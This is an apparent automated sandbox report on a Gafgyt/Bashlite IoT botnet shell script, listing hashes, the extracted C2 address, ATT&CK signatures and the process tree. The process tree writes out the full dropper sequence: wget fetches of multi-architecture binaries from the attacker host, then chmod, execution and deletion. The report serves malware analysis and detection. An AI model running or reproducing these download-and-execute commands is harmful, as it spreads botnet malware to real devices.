Analysis
-
max time kernel
2s -
max time network
22s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
01-01-2025 03:17
General
-
Target
e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
-
Size
2KB
-
MD5
87a7140288b8fc77f9917199d1c969bb
-
SHA1
0931d942a8cc6f317b24082900bd24ec697a697e
-
SHA256
e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f
-
SHA512
2cdebd869d0cd7f590f050fe987af0ff80592646cdaaff83b7b78f07c8328401c87bd4b8d072dd87ef26de619a2ec7e06ad7e61204371e93e21a1835f23097f7
Score
10/10
Malware Config
Extracted
Family
gafgyt
C2
195.179.230.64:606
Signatures
-
Detected Gafgyt variant 1 IoCs
-
Gafgyt family
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh/tmp/e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh1⤵
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.mips2⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.mips./chernobyl.mips2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
- System Network Configuration Discovery
-
-
/bin/rmrm -rf chernobyl.mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.mipsel2⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.mipsel./chernobyl.mipsel2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf chernobyl.mipsel2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.sh42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.sh42⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.sh4./chernobyl.sh42⤵
-
-
/bin/rmrm -rf chernobyl.sh42⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.x862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.x86./chernobyl.x862⤵
-
-
/bin/rmrm -rf chernobyl.x862⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.m68k2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.m68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.m68k./chernobyl.m68k2⤵
-
-
/bin/rmrm -rf chernobyl.m68k2⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.i6862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.i6862⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.i686./chernobyl.i6862⤵
-
-
/bin/rmrm -rf chernobyl.i6862⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.ppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.ppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.ppc./chernobyl.ppc2⤵
-
-
/bin/rmrm -rf chernobyl.ppc2⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.i5862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.i5862⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.i586./chernobyl.i5862⤵
-
-
/bin/rmrm -rf chernobyl.i5862⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.sparc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.sparc2⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.sparc./chernobyl.sparc2⤵
-
-
/bin/rmrm -rf chernobyl.sparc2⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.arm42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.arm42⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.arm4./chernobyl.arm42⤵
-
-
/bin/rmrm -rf chernobyl.arm42⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.arm52⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.arm52⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.arm5./chernobyl.arm52⤵
-
-
/bin/rmrm -rf chernobyl.arm52⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.arm62⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.arm62⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.arm6./chernobyl.arm62⤵
-
-
/bin/rmrm -rf chernobyl.arm62⤵
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.arm72⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x chernobyl.arm72⤵
- File and Directory Permissions Modification
-
-
/tmp/chernobyl.arm7./chernobyl.arm72⤵
-
-
/bin/rmrm -rf chernobyl.arm72⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
149KB
MD576cd360f074eaa5d8287bb0762aab991
SHA172da777df5b6d7794efa05d87e5528d0c45e1403
SHA256e6177852038d2130936a6c52ae274f813d5338f94b4f27faa6e19f7db19cbd46
SHA512897e406c0982fa347e945653a5af9db7876004ff0e54a9a2bb5cde10bb0df3b52172a54481726d974621291deaae0c29df90e2333eb81c6fe30f15e190cdfd38